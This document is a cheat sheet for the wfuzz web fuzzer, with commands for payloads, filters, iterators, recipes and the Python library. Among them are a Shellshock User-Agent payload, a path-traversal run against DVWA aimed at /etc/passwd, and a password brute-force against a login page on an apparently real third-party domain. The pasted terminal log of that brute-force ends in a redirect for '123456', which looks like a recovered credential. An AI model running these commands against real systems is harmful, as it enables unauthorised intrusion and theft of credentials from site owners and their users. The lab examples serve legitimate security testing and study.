wfuzz

  • A fuzzer written in Python

    • Feature-rich, fast, flexible and extensible
    • Submits data to the server through every entry point (IP, domain, port, method, variable, header...)
    • Marks injection points with a placeholder (FUZZ)
    • The payload you specify is substituted for the placeholder and the data is submitted
  • Payload modules (encoders/iterators/scripts/printers)

    • wfuzz -e payloads

    • wfuzz -z help --slice file   # detailed help for the file payload

    • wfuzz -z range,1-254 -z file,a.txt --hc 404 http://1.1.1.FUZZ/FUZ2Z

    • -Z --conn-delay 3 --req-delay 3

    • wfuzz -z range,1-254 -z file,a.txt --hh BBB http://1.1.1.FUZZ{b}/FUZ2Z{a}

    • Sample run (terminal session):

        /usr/share/wordlists                            23s   root@kali  0.07   14:40:25
        ❯ wfuzz -c -v -w ./SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -d "user=admin&pw=FUZZ{a}" --hh BBB -u "http://www.c1moon.com/admin/index.php?action=login"
        /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
        ********************************************************
        * Wfuzz 3.1.0 - The Web Fuzzer                         *
        ********************************************************

        Target: http://www.c1moon.com/admin/index.php?action=login
        Total requests: 10000

        ====================================================================================================================================================
        ID           C.Time       Response   Lines      Word     Chars       Server                           Redirect                         Payload
        ====================================================================================================================================================

        000000001:   1.039s       200        33 L       100 W    1549 Ch     Microsoft-IIS/8.5                                                 "a"
        000000002:   1.063s       302        1 L        3 W      87 Ch       Microsoft-IIS/8.5                ./                               "123456"
        ^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

        Total time: 0
        Processed Requests: 141
        Filtered Requests: 139
        Requests/sec.: 0

    • wfuzz -H "User-Agent: () { :;}; echo; echo XXX" --ss XXX -w cgi.txt http://a/FUZZ

  • Filtering results (hide / show)

    • --hc / --sc  # response code
    • --hl / --sl  # number of lines in the response body
    • --hw / --sw  # number of words in the response body
    • --hh / --sh  # number of chars in the response body
    • --hs / --ss  # regex match against the response body
  • --filter

    • wfuzz -c -v -z list,a-b-admin -z list,1-2-password -d "username=FUZZ&password=FUZ2Z&Login=Login" --filter "headers.response.Location='~index.php'" http://url/dvwa/login.php
    • http://wfuzz.readthedocs.io/en/latest/
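To make the hide/show filters concrete, here is an added Python model (not wfuzz's own code) of how one response is judged against --hc/--hl/--hw/--hh/--hs/--ss, including the BBB shorthand that refers to the FUZZ{a} baseline request from the login run above. The counting convention (lines = newlines, words = runs of non-whitespace, chars = body length) is assumed to match what wfuzz prints in its L/W/Ch columns; the responses are constructed sample data.

```python
import re
from dataclasses import dataclass

@dataclass
class Resp:
    """One fuzzed response (constructed sample data, not a live capture)."""
    payload: str
    code: int
    body: str

def counts(body):
    """Lines / words / chars as shown in wfuzz's L, W, Ch columns.
    Assumption: lines = newline count, words = runs of non-whitespace, chars = body length."""
    return body.count("\n"), len(re.findall(r"\S+", body)), len(body)

def hidden(resp, baseline, hc=(), hl=(), hw=(), hh=(), hs=None, ss=None):
    """True when the hide/show filters would drop this response.
    The string 'BBB' in a hide list stands for the baseline's value,
    i.e. the response to the FUZZ{a} request."""
    lines, words, chars = counts(resp.body)
    b_lines, b_words, b_chars = counts(baseline.body)

    def resolve(values, base):
        return {base if v == "BBB" else int(v) for v in values}

    if resp.code in resolve(hc, baseline.code):
        return True
    if lines in resolve(hl, b_lines) or words in resolve(hw, b_words) or chars in resolve(hh, b_chars):
        return True
    if hs and re.search(hs, resp.body):        # --hs: hide bodies matching the regex
        return True
    if ss and not re.search(ss, resp.body):    # --ss: show only bodies matching the regex
        return True
    return False

def shown(responses, baseline, **filters):
    """Payloads that survive the filters, in request order."""
    return [r.payload for r in responses if not hidden(r, baseline, **filters)]

# Constructed sample mirroring the login run above: identical 'login failed' pages
# for wrong passwords and a short 302 page for the one that logs in.
LOGIN_FAIL = "<html>\n<body>\n<p>Login failed</p>\n</body>\n</html>\n"
LOGIN_OK = "Redirecting to ./\n"
BASELINE = Resp("a", 200, LOGIN_FAIL)              # the FUZZ{a} baseline request
SAMPLE = [Resp("password", 200, LOGIN_FAIL), Resp("admin", 200, LOGIN_FAIL), Resp("123456", 302, LOGIN_OK)]

if __name__ == "__main__":
    print(shown(SAMPLE, BASELINE, hh=["BBB"]))   # --hh BBB -> ['123456']
    print(shown(SAMPLE, BASELINE, hc=["302"]))   # --hc 302 -> ['password', 'admin']
```

Note that --hh BBB surfaces only the response whose length differs from the baseline, which is why the 302 stands out in the run above while the 139 identical failures are filtered.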

URL parameters

wfuzz -c -v -w /usr/share/wfuzz/wordlist/Injections/Traversal.txt -b "security=low; PHPSESSID=898d5fb4a2b85261f1dff1fca1d9b30c" --ss 'root;x' -u http://ip/dvwa/vulnerabilities/fi/?page=FUZZ

Testing cookies
wfuzz -z file,a.txt -b cookie=FUZZ http://ip/

Testing headers
wfuzz -z file,a.txt -H "User-Agent: IE99" http://ip/FUZZ

Request methods
wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS-DELETE-MOVE -X FUZZ http://ip/

Using a proxy
wfuzz -z file,a.txt -p ip:8080 http://ip/FUZZ

HTTP authentication (FUZZ and FUZ2Z each need their own payload)
wfuzz -z list,user -z list,pass --basic FUZZ:FUZ2Z http://ip/

Recursion depth
wfuzz -z file,a.txt -R 3 http://ip/FUZZ

Speed control
-t  # threads (concurrency)
-s  # delay between requests

Output format
wfuzz -f outfile,json -w a.txt http://ip/FUZZ

Global configuration: ~/.wfuzz/wfuzz.ini
cancel_on_plugin_except = 1  # abort when a plugin raises an exception
concurrent_plugins = 3  # maximum number of plugins running concurrently
lookup_dirs = .  # directories searched for wordlist files
encode_space = 1  # encode spaces

Iterators module
wfuzz -e iterators
zip: pairs the wordlists entry by entry / chain: several wordlists feeding a single variable / product: cross product (default)
wfuzz -z list,a-b-c -z list,1-2-3 -m zip http://ip/FUZZ/FUZ2Z

Encoders module
wfuzz -z file,a.txt,md5 http://ip/FUZZ

Script module
wfuzz --script=robots -z list,robots.txt http://ip/FUZZ

Saving a job and replaying it (recipe)
wfuzz --script=robots -z list,a.txt --dump-recipe job1 http://ip/FUZZ
wfuzz --recipe job1

Pre-filtering payloads (u() drops duplicate entries)
wfuzz -z list,1-2-1-2-a --slice "FUZZ|u()" http://1.1.1.1/FUZZ

The wfuzz library
import wfuzz

# hc hides 404 responses; payloads is a list of (payload_name, options) tuples
for r in wfuzz.fuzz(url="http://ip/FUZZ", hc=[404], payloads=[("file", dict(fn="a.txt"))]):
    print(r)